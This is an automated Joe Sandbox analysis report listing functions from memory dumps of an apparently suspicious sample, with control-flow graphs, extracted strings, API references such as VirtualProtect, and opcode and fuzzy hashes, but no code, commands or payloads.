                                      control_flow_graph 271 5305db8-5305e1c call 53051c0 280 5305e4c-5305e88 call 5305cd0 271->280 281 5305e1e-5305e27 271->281 325 5305ec3-5305efc 280->325 326 5305e8a-5305ebc 280->326 282 5305efd-5305f11 281->282 283 5305e2d-5305e31 281->283 290 5305f13-5305f28 282->290 291 5305f3e-5305f3f 282->291 286 5305e39-5305e3b 283->286 288 5305e46-5305e4a 286->288 289 5305e3d-5305e3f 286->289 288->280 288->281 289->288 295 5305fe2-5305fe5 290->295 296 5305f29-5305f2e 290->296 293 5305f41-5305f43 291->293 294 5305f67-5305f75 291->294 293->296 297 5305f45 293->297 311 5305f85-5305f93 294->311 312 5305f77-5305f80 294->312 298 5305ff6-5305ffc 295->298 299 5305fe7-5305fea 295->299 300 5305f2f 296->300 297->300 303 5305f46-5305f54 297->303 306 5306011-530603a 298->306 307 5305ffe-5306001 298->307 304 5305fec-5305ff2 299->304 305 530600d-530600f 299->305 308 5305f30-5305f36 300->308 309 5305f39-5305f3d 300->309 330 5305f56-5305f62 303->330 331 5305fae-5305fb1 303->331 304->306 314 5305ff4 304->314 316 530603e-5306041 305->316 306->316 307->306 315 5306003-5306009 307->315 308->309 309->291 327 5305fa3-5305fa5 311->327 328 5305f95-5305f9e 311->328 312->316 319 530603c 314->319 315->306 320 530600b 315->320 319->316 320->319 326->325 327->331 328->316 330->316 336 5305fb3-5305fdc 331->336 337 5305fde-5305fe0 331->337 336->316 337->316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Tt$Pqq
                                      • API String ID: 0-1614511813
                                      • Opcode ID: c13492df2ccac68342aa85a0528798c293a53c76ca61989c72f70c7ee4b695c5
                                      • Instruction ID: ff98ce726492a86300493dd50d264ff55f4db5b887f746532c455cfbda03b1a1
                                      • Opcode Fuzzy Hash: c13492df2ccac68342aa85a0528798c293a53c76ca61989c72f70c7ee4b695c5
                                      • Instruction Fuzzy Hash: 1261D3317043048FDB29AB39D5A4A3E7BE7BFC9240B245529D406CB7D9EEB0DC028B95
                                      Function 02A1AFD8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 642 2a1afd8-2a1b096 VirtualProtect 645 2a1b098-2a1b09e 642->645 646 2a1b09f-2a1b0e7 642->646 645->646
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 02A1B086
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3710884134.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a10000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 1306f6bdf5d3cb4490b857e5b0160ea570770618d03157f084aec7eca7f640c6
                                      • Instruction ID: 26ded9865dd8ed8e4aef156eefad8a94f6da9a1cdd547c915250a101bad35558
                                      • Opcode Fuzzy Hash: 1306f6bdf5d3cb4490b857e5b0160ea570770618d03157f084aec7eca7f640c6
                                      • Instruction Fuzzy Hash: 444198B9D002589FCB10CFAAD984ADEFBB1BB09314F10942AE814B7310D775AA46CF64
                                      Function 02A1AFE0 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 650 2a1afe0-2a1b096 VirtualProtect 652 2a1b098-2a1b09e 650->652 653 2a1b09f-2a1b0e7 650->653 652->653
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 02A1B086
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3710884134.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a10000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 5862e2cb7f72e99a1ea4bcf017bfd6ff61dbc3aedcb6ee81643c3149174a51b9
                                      • Instruction ID: 53906a8b21683e3a4ea94112e0bfd97576cc13d42a7d41fc83678b34e38a650d
                                      • Opcode Fuzzy Hash: 5862e2cb7f72e99a1ea4bcf017bfd6ff61dbc3aedcb6ee81643c3149174a51b9
                                      • Instruction Fuzzy Hash: B93189B9D002589FCB10CFA9D984ADEFBF5BB09314F10942AE814B7350D775A945CF64
                                      Function 053049C8 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 657 53049c8-5304a4f 666 5304a55-5304aa1 657->666 667 5304adc-5304b55 657->667 745 5304aa3 call 5304e98 666->745 746 5304aa3 call 5304e88 666->746 684 5304c80-5304ceb 667->684 685 5304b5b-5304c7e 667->685 681 5304aa9-5304ad5 681->667 702 5304cf2-5304d61 684->702 685->702 743 5304d63 call 5305db8 702->743 744 5304d63 call 5305da8 702->744 726 5304d69-5304dc0 737 5304dc2 726->737 738 5304de5-5304df5 726->738 739 5304dc5-5304dd0 737->739 740 5304dd2-5304dd5 739->740 741 5304ddc-5304de3 739->741 740->741 741->738 741->739 743->726 744->726 745->681 746->681
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: b9d677cd66a0a02070849bb46c6b7cb9fb2b7353a529b0393d93e1c705386126
                                      • Instruction ID: ab664408af439ba2ae10337e293dfa66338ba5b71d8e5a2bfd6a55378a414d7c
                                      • Opcode Fuzzy Hash: b9d677cd66a0a02070849bb46c6b7cb9fb2b7353a529b0393d93e1c705386126
                                      • Instruction Fuzzy Hash: 00C1C735B102088FDB48EF79D59966D7BF2FF88711B248029E80ADB395DE749D02CB85
                                      Function 05303380 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 747 5303380-53033f4 751 53033fc-5303405 747->751 752 5303407-5303418 751->752 753 530341b-530354f 751->753 761 5303551-5303563 753->761 762 5303566-53035cf 753->762 761->762 765 53035d1-53035d7 762->765 766 53035d8-5303637 762->766 765->766 770 5303641-5303645 766->770 771 5303639 766->771 772 5303647-530365f 770->772 773 530368d 770->773 771->770 774 5303661-5303679 772->774 775 530367c-5303682 772->775 776 530368e 773->776 774->775 775->773 776->776
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q
                                      • API String ID: 0-1301096350
                                      • Opcode ID: 6226e924adb7a26db12312f6b117d0f32d75439a950405b6326f5ed59701deed
                                      • Instruction ID: a3c91cf3c76618e52af9f577fc6fcf41503a2e63b117a53b60da6f3b35831c6c
                                      • Opcode Fuzzy Hash: 6226e924adb7a26db12312f6b117d0f32d75439a950405b6326f5ed59701deed
                                      • Instruction Fuzzy Hash: 6EA1CFB5E003189FDB14CFA9D884BDEBBB1BF49300F10856AE818AB351DB749A85CF54
                                      Function 053065E8 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      • Opcode ID: a2f17911d7c6023a7c2ddb275c62523ea3b07d9fde9df0dcf3706d942614a1a1
                                      • Instruction ID: e908372c9e0d57765c5d1d58adf0c633e223f7ebb8b907b2c08c765a3037f6e0
                                      • Opcode Fuzzy Hash: a2f17911d7c6023a7c2ddb275c62523ea3b07d9fde9df0dcf3706d942614a1a1
                                      • Instruction Fuzzy Hash: 0B81B376650100AFDB4A9F98D944E157FB6FF8D31471A80D8F20A8F272C772D861EB90
                                      Function 053070B0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hq
                                      • API String ID: 0-1594803414
                                      • Opcode ID: a7ffd8794d97e761aa3fbc7f3332ba71b85e70ea558edd4324386d44b27f9ee6
                                      • Instruction ID: 87c01af42a72d34acfd8e0417f2fb44ca03cc5c5166d4c51cab841938a14758a
                                      • Opcode Fuzzy Hash: a7ffd8794d97e761aa3fbc7f3332ba71b85e70ea558edd4324386d44b27f9ee6
                                      • Instruction Fuzzy Hash: 7061C536250104EFDB0A9F98D954D55BBB7FF8D32470A8099F60A8B272C772DC62EB50
                                      Function 05305DA8 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Tt
                                      • API String ID: 0-3315984107
                                      • Opcode ID: 3eb0ac342d4eba8c881f98bff27ab5fd232bbe5cabba59a7bcf2c14be64c1702
                                      • Instruction ID: 19b803b16bff1d6e9b2a410c6850756667126942f0cbde7317b91082f09a30d5
                                      • Opcode Fuzzy Hash: 3eb0ac342d4eba8c881f98bff27ab5fd232bbe5cabba59a7bcf2c14be64c1702
                                      • Instruction Fuzzy Hash: E7313E357007058FDB19AB79D5A4A6E7BE3AFC9700B245428D40ACB799EE70EC028B95
                                      Function 053030F0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (q
                                      • API String ID: 0-2414175341
                                      • Opcode ID: fb4bc9563122b4e768007484063102955cb54f273265ba2338ac25543397f30d
                                      • Instruction ID: 01afd47c7c61747dba0713d34efeb36b5a675c3d3e6ace0e1f43ce1f5317417f
                                      • Opcode Fuzzy Hash: fb4bc9563122b4e768007484063102955cb54f273265ba2338ac25543397f30d
                                      • Instruction Fuzzy Hash: D52126327042069FCB05EF34E85896EBFB5FF89310B14846AE506D7282CB34DD16CBA5
                                      Function 05306570 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: d351bdf6fcf0c13e6a7e88f3f99249ab02597d5e8164b7dccffb16ef7161938c
                                      • Instruction ID: 439dd86415d97244282b695931d50cccdcfefd7e4a6c1003bcc40a723fafb5dc
                                      • Opcode Fuzzy Hash: d351bdf6fcf0c13e6a7e88f3f99249ab02597d5e8164b7dccffb16ef7161938c
                                      • Instruction Fuzzy Hash: 19F09071A1020A9FCB04EBB5F50B78D7F75FF45301F0042A5E40ADB24AEA706E44DBA2
                                      Function 05306580 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: c263f3a86eaa01a16c1a04a527cad78e71020600af8e80ee5875d6b321140671
                                      • Instruction ID: 91b59910304b500f16edf250adc3bc9d7207ebb6ccbecb0c9ae50d0b1f94d747
                                      • Opcode Fuzzy Hash: c263f3a86eaa01a16c1a04a527cad78e71020600af8e80ee5875d6b321140671
                                      • Instruction Fuzzy Hash: BEF08230A10209DFCB08EFA5F50A78D7F75FF41301B104265E409DB156DE702E049B92
                                      Function 0530C72D Relevance: .4, Instructions: 399COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f114a25a832c2af455ccc7d2477a7fda1f8a72c832d6098c6cdc61bb00e8201
                                      • Instruction ID: 1765ba5da89e8d48e8af54d3ac57e4d44e9b694cc75379f19ebb5d96ec9f87e2
                                      • Opcode Fuzzy Hash: 9f114a25a832c2af455ccc7d2477a7fda1f8a72c832d6098c6cdc61bb00e8201
                                      • Instruction Fuzzy Hash: 3FF1D370D0032C8FDB24DFA8C895BADFBB1BB49310F10A6AAD419A7290DB749D85CF55
                                      Function 05301E28 Relevance: .4, Instructions: 375COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b10ca2986a88bc852e5c652f14872c7fb3ae1e902546fcc58d11da7ec9a6a92d
                                      • Instruction ID: 09c875459f4b9c1092cd30e576fdb625a88f584bb13251d237f02faa886ac0bc
                                      • Opcode Fuzzy Hash: b10ca2986a88bc852e5c652f14872c7fb3ae1e902546fcc58d11da7ec9a6a92d
                                      • Instruction Fuzzy Hash: 3D022B34A00319CFDB64DF64D854B9EBBB6FF88310F148299E509A72A1DB709E85CF91
                                      Function 0530D55C Relevance: .4, Instructions: 372COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0714ea9d35037e94a1e029e5defd93a7e3f3678d664f6ea60f298f51afa8360d
                                      • Instruction ID: b82162fed08ba9112bba836fd91b57b720a625e1baf8a70edcd7d47851a94e98
                                      • Opcode Fuzzy Hash: 0714ea9d35037e94a1e029e5defd93a7e3f3678d664f6ea60f298f51afa8360d
                                      • Instruction Fuzzy Hash: 7AF1F370D04328CFDB24DFA8C895BADBBF1BF48310F1495AAD409A7290EB749985CF95
                                      Function 0530C1DC Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd7d130447a614b8cf78f16562939b331e075a238b2f5ec4f7ab798134706dfd
                                      • Instruction ID: 5113c752a18a1be637054440f29e560f2c7040d693eee9c22e36b921943e32ea
                                      • Opcode Fuzzy Hash: bd7d130447a614b8cf78f16562939b331e075a238b2f5ec4f7ab798134706dfd
                                      • Instruction Fuzzy Hash: 3AE1D270D0031C8FEB64DFA8C894BADFBB1BF49304F14A6AAD409A7290DB749985CF55
                                      Function 05308597 Relevance: .2, Instructions: 226COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 000a240d2c09febf316ce39c590e2b89054fa68ab8d04cc0227cb9e5128c7762
                                      • Instruction ID: 526a3728d127630e69b55501422fb4811e12035f53cee2e4bd0604069bfee60f
                                      • Opcode Fuzzy Hash: 000a240d2c09febf316ce39c590e2b89054fa68ab8d04cc0227cb9e5128c7762
                                      • Instruction Fuzzy Hash: 8BC16D78E05228CFDB60DFA8D994B9DBBB2BB49310F10919AD849A7744DB706E81CF11
                                      Function 05302DA8 Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d44c7f6c30dfbbf820ed6489c6f193315240639dbcb9bc5daf2ddf3e9dbcda77
                                      • Instruction ID: 297a22d74ac0bcbcc2063190d85ead258db10cca7004490ffcb6b0a892759e13
                                      • Opcode Fuzzy Hash: d44c7f6c30dfbbf820ed6489c6f193315240639dbcb9bc5daf2ddf3e9dbcda77
                                      • Instruction Fuzzy Hash: AD712836A043099FCB15DF69D858AAFBBF5FF84310F04852AF819D7280DB30A945CBA5
                                      Function 05303B70 Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d022694aafa02c7fdba62cdfca86746a0efa010f1f6beb9f4f21866af41ea578
                                      • Instruction ID: 4ef2b0e42a7e0d74745a61f5ffa2d86012c0545040278da0d1e257bab128cf07
                                      • Opcode Fuzzy Hash: d022694aafa02c7fdba62cdfca86746a0efa010f1f6beb9f4f21866af41ea578
                                      • Instruction Fuzzy Hash: 69518E31B003058FCB24DF79D89496EBBF6FF89210B148969E44ADB795DB70EC058BA1
                                      Function 05303258 Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f488041615a135be22eba163bbc399aaffe72a69f27bf204bb9a3f7ffb667f5e
                                      • Instruction ID: 690ecee51aa2d58cf679f667ccb65e76baf52f1c692e9eafb8ae42e6d7dc1fe7
                                      • Opcode Fuzzy Hash: f488041615a135be22eba163bbc399aaffe72a69f27bf204bb9a3f7ffb667f5e
                                      • Instruction Fuzzy Hash: 9B51B031B002098FCB15EFA9D8557AEBBB2FF88310F14852AE509EB351DB709D55CBA4
                                      Function 0530A194 Relevance: .1, Instructions: 143COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5196c0f7c2091efacbe00137d73501a56da95dc318394b391d34ed82730985c
                                      • Instruction ID: 9460fe688716f79ccf99709ae2b3d47ae3c555bcf89d15615a7149c63c197134
                                      • Opcode Fuzzy Hash: b5196c0f7c2091efacbe00137d73501a56da95dc318394b391d34ed82730985c
                                      • Instruction Fuzzy Hash: 4851BCB4D053089FDF14CFA9D984A9EFBB1BF09300F20A16AE818B7251DB349985CF54
                                      Function 0530E610 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9544fef55622f58d9cf9a01e04d72e23d2eaceb77b7fd4d72ab4c2a90c97f57
                                      • Instruction ID: b32b252e44406a1ed47c1a3ad5277f0266782d39006410acfb342b4ea1f9dd82
                                      • Opcode Fuzzy Hash: b9544fef55622f58d9cf9a01e04d72e23d2eaceb77b7fd4d72ab4c2a90c97f57
                                      • Instruction Fuzzy Hash: 10510178E15318CBDB04CFA9D9609AEBBFAEF89300F14A52AD405BB744DB709802DF15
                                      Function 0530A1A0 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d6d62d025b78e983a6e75ba5dad97101f7b5acf266df385f668ae2074b0781a
                                      • Instruction ID: d4b44ad8ebf4cdaeb1153fa7ba05082651261cb0c398aeaa62d248495a2f99e5
                                      • Opcode Fuzzy Hash: 1d6d62d025b78e983a6e75ba5dad97101f7b5acf266df385f668ae2074b0781a
                                      • Instruction Fuzzy Hash: D851ACB4D053489FDF24CFA9D984A9EFBB1BF09300F60A06AE818B7251DB349985CF54
                                      Function 05302AAF Relevance: .1, Instructions: 136COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a36d768900be889a8469cc42ba2a11682226ebcb8ffe61d3bfebefb5c89fe2a
                                      • Instruction ID: b02c7a8e9f7d78fb93d210e25d40f033ea7d53d6130c177b6451a553aa27c0bb
                                      • Opcode Fuzzy Hash: 6a36d768900be889a8469cc42ba2a11682226ebcb8ffe61d3bfebefb5c89fe2a
                                      • Instruction Fuzzy Hash: 625166B6D093989FDB11DFA8C895ACEBFB1EF0A310F24805AE444AB251D7709849CF44
                                      Function 0530E602 Relevance: .1, Instructions: 132COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf2c61eef8390ffdd7e6c4e79f898d26b8597eac5af361bc490ccf5cb1cc256b
                                      • Instruction ID: 94f6cd6cddaa3776b2b133345ef59d88d02b0da65c794486517f183cf0f058dc
                                      • Opcode Fuzzy Hash: bf2c61eef8390ffdd7e6c4e79f898d26b8597eac5af361bc490ccf5cb1cc256b
                                      • Instruction Fuzzy Hash: 8C51F278E14218CBDB04CFA9D954AAEBBFAFF89300F14952AD405BB354DB709802DF15
                                      Function 05833A19 Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8cd584fa6c955afe339402972b4f0cb1cfbba1107ede233131cb48ac3d7b6fc
                                      • Instruction ID: fbc7a17645e70ec3c60af54f203067ba11c0214a56eed9dda9d697c50e8ef032
                                      • Opcode Fuzzy Hash: a8cd584fa6c955afe339402972b4f0cb1cfbba1107ede233131cb48ac3d7b6fc
                                      • Instruction Fuzzy Hash: 5251F974E14228CFDB64CF64D981B9DBBB2FB89214F1095AAD50EA7351DB309E82CF50
                                      Function 0530207E Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0aad1fab281ad551f63eefe2110b93a5610cbcbea7ba54a79355d6b4c4833d94
                                      • Instruction ID: 3695dd92a12e163af2392b42bd9196fc6b01de45e9990aa73632b557b4c086a0
                                      • Opcode Fuzzy Hash: 0aad1fab281ad551f63eefe2110b93a5610cbcbea7ba54a79355d6b4c4833d94
                                      • Instruction Fuzzy Hash: A151F335A00228CFDB65DFA4D854B99BBB2FF48310F1581D9E509AB2A6DB319E81CF50
                                      Function 0530F008 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bb693e4ca79776eef3074e265db32955e0db315f13333c45ea3d9f3eafdab92
                                      • Instruction ID: 66fe0a6bd4d1e279ad00693c2a96624dbddbc79deebf2c7212970e149eda225e
                                      • Opcode Fuzzy Hash: 4bb693e4ca79776eef3074e265db32955e0db315f13333c45ea3d9f3eafdab92
                                      • Instruction Fuzzy Hash: CF4125B4E0931ADFCB04CFA9D9546EEBBB2FF89300F10946AD415A32A0D7344A45CFA4
                                      Function 05833835 Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d0c7d7e7882dfbe6fd0d0617eeeedb582e9c5630e251190bb4d3bfe014be9f3
                                      • Instruction ID: e5c4734cdb51a3bbd2ebf9f97241f1a903e042d4f43dd14d2026f9371620eb65
                                      • Opcode Fuzzy Hash: 7d0c7d7e7882dfbe6fd0d0617eeeedb582e9c5630e251190bb4d3bfe014be9f3
                                      • Instruction Fuzzy Hash: E541CD74D0A21DDFDB04CFA5D881A9DBBB2BB89204F109955E80AE7364DB30AE45CF94
                                      Function 05833549 Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa365a6deaf4ef728f06e281479c22b318027d68c427a9399034d7d6d713f199
